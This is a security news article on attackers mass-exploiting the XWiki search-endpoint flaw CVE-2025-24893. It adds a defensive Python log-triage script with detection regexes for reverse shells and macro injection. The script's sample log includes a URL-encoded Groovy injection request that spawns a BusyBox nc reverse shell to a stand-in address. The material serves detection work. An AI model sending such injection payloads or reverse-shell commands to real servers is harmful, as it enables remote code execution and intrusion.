Threat actors started exploiting a critical XWiki vulnerability en masse within two weeks of the bug being reported as exploited in the wild, VulnCheck warns.
Tracked as CVE-2025-24893 (CVSS score of 9.8), the flaw was discovered in May 2024 and patched in June 2024, but a CVE identifier was assigned to it only in early 2025, after technical information became public.
The bug exists because, in XWiki versions before 15.10.11, 16.4.1 and 16.5.0RC1, user-supplied input to a search function is not properly sanitized before it is processed, so a remote, unauthenticated attacker (any guest able to reach the instance) can execute arbitrary code on the server with a single crafted request to the search endpoint. Upgrading to one of the fixed releases removes the issue.
Proof-of-concept (PoC) code targeting the issue has been publicly available since early 2025, and security researchers had observed reconnaissance probes for the flaw, but in-the-wild exploitation only began last month.
In late October, VulnCheck warned that a threat actor was exploiting CVE-2025-24893 as part of a cryptocurrency mining operation, and the US cybersecurity agency CISA added the bug to its Known Exploited Vulnerabilities (KEV) catalog two days later.
Now, VulnCheck says the activity targeting vulnerable XWiki servers has expanded significantly, with multiple threat actors exploiting the bug in their attacks.
The RondoDox botnet has added an exploit for the CVE to its toolset and has been targeting the flaw with increasing frequency since November 3.
Since November 7, the flaw has also been exploited in a second crypto-mining operation, while the threat actor behind the first mining operation expanded its infrastructure with two new payload-hosting servers and a new server hosting the exploit.
VulnCheck also observed attacks in which an IP address associated with AWS, with no history of abuse, was used “to establish a reverse shell back to itself using the BusyBox nc binary”, likely as part of a targeted attack.
Other threat actors also attempted to establish web shells on vulnerable XWiki servers. One of the attacks originated from an IP that “exposes both QNAP and DrayTek interfaces to the internet”, which suggests a compromised host, and attempted to deploy a bash reverse shell.
Additionally, VulnCheck has observed numerous threat actors simply performing scans and probes of vulnerable servers, including some using Nuclei templates.
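For defenders, the activity described above (macro-injection requests to the search endpoint, BusyBox nc and bash reverse shells, and scanner probes) can be triaged from ordinary web-server access logs. The script below is an added example written for this article; it is not VulnCheck's or the XWiki project's code. It assumes a combined-format access log from a reverse proxy in front of XWiki, assumes the vulnerable search endpoint lives under a path containing "SolrSearch", and uses indicator patterns (XWiki scripting-macro markup in query parameters, reverse-shell command fragments, a self-identifying scanner User-Agent) that are assumptions to tune for your deployment. The log lines are constructed, with RFC 5737 documentation addresses.

```python
"""Triage XWiki access-log lines for CVE-2025-24893-style activity.

Added example; not from the article or the XWiki project. The endpoint
path, log format and indicator patterns are assumptions: adjust them to
what your own deployment actually serves and logs.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the vulnerable search endpoint is reached under a path
# containing "SolrSearch". The article only says "the search endpoint".
SEARCH_PATH_RE = re.compile(r"/SolrSearch\b", re.IGNORECASE)

# Assumed indicators. XWiki scripting-macro markup has no business in a
# search string; the shell patterns cover the BusyBox nc and bash reverse
# shells the article describes.
MACRO_RE = re.compile(r"\{\{/?\s*(groovy|async|velocity|python)\b", re.IGNORECASE)
SHELL_RE = re.compile(
    r"(?:\bbusybox\b|\bnc\b|\bncat\b).*\s-e\s|/dev/tcp/|\bbash\s+-i\b",
    re.IGNORECASE,
)

# Assumption: the scanner identifies itself in the User-Agent (Nuclei's
# default UA mentions "nuclei"). Scanners that spoof a browser UA need
# other signals, such as request volume per source.
SCANNER_UA_RE = re.compile(r"nuclei|masscan|zgrab", re.IGNORECASE)

# Combined log format, as written by nginx/Apache in front of XWiki.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def decoded_params(target):
    """Return the URL-decoded values of every query parameter, joined."""
    values = []
    for vals in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        values.extend(vals)
    return " ".join(values)


def classify(line):
    """Return (verdict, parsed_fields) for one access-log line.

    Verdicts, most severe first:
      exploit-shell  search endpoint + macro markup + reverse-shell command
      exploit-macro  search endpoint + scripting-macro markup
      scan           search endpoint hit by a self-identifying scanner
      benign         anything else
      unparsed       line does not match the combined log format
    """
    m = LOG_RE.match(line)
    if not m:
        return "unparsed", None
    f = m.groupdict()
    if not SEARCH_PATH_RE.search(urlsplit(f["target"]).path):
        return "benign", f
    params = decoded_params(f["target"])
    if MACRO_RE.search(params):
        return ("exploit-shell" if SHELL_RE.search(params) else "exploit-macro"), f
    if SCANNER_UA_RE.search(f["ua"]):
        return "scan", f
    return "benign", f


def triage(lines):
    """Aggregate non-benign verdicts per source IP: {ip: {verdict: count}}."""
    report = {}
    for line in lines:
        verdict, f = classify(line)
        if f is None or verdict == "benign":
            continue
        per_ip = report.setdefault(f["ip"], {})
        per_ip[verdict] = per_ip.get(verdict, 0) + 1
    return report


# Constructed sample log (not real traffic); addresses are RFC 5737 ranges.
SAMPLE_LOG = [
    # Legitimate search for "backup policy".
    '192.0.2.10 - - [10/Nov/2025:09:01:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=backup+policy HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    # Scripting-macro markup injected into the search text (payload is a harmless println).
    '198.51.100.7 - - [10/Nov/2025:09:02:45 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22probe%22%29%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    # Same injection, but the payload spawns a BusyBox nc reverse shell.
    '198.51.100.7 - - [10/Nov/2025:09:02:51 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Bgroovy%7D%7D%22busybox+nc+203.0.113.5+4444+-e+/bin/sh%22.execute%28%29%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    # Scanner probe with Nuclei's self-identifying User-Agent, no payload.
    '203.0.113.42 - - [10/Nov/2025:09:05:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=xwiki HTTP/1.1" 200 2310 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"',
]

if __name__ == "__main__":
    for ip, verdicts in triage(SAMPLE_LOG).items():
        print(ip, verdicts)
```

Run against a real log with `triage(open("access.log").readlines())`; the verdict order matters because a reverse-shell payload always also contains macro markup, so the more severe check runs first. Decoding every query parameter rather than just `text` keeps the check from being bypassed by moving the payload to another parameter, and the `unparsed` verdict lets you notice when the log format is not what you assumed.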
“Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale,” VulnCheck notes.